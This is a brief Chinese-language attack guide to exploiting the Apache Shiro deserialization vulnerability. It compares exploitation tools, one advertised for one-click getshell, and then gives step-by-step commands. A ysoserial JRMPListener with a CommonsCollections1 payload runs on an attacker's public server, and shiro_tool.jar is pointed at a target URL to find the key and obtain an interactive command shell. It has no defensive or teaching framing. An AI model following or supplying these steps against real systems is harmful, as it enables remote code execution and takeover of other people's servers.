1、shiro反序列化漏洞綜合利用工具
優點:圖形化、傻瓜化工具,一鍵getshell
缺點:利用鏈少,回顯方式少
2、ShiroExploit
基於ysoserial項目開發,payload多
3、ysoserial配合shiro_tool
ysoserial工具有多種payload
利用方式:
1、第一步
判斷shiro利用鏈並在公網服務器起一個監聽
java -cp ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 8888 CommonsCollections1 "ping xxxx.dnslog.cn"
2、第二步
使用shiro_tool
java -jar shiro_tool.jar url
自動判斷key,成功后出現交互式shell,可輸入監聽ip:port
3、第三步
在第二步的交互式shell中輸入第一步的ip和端口
成功后即可執行命令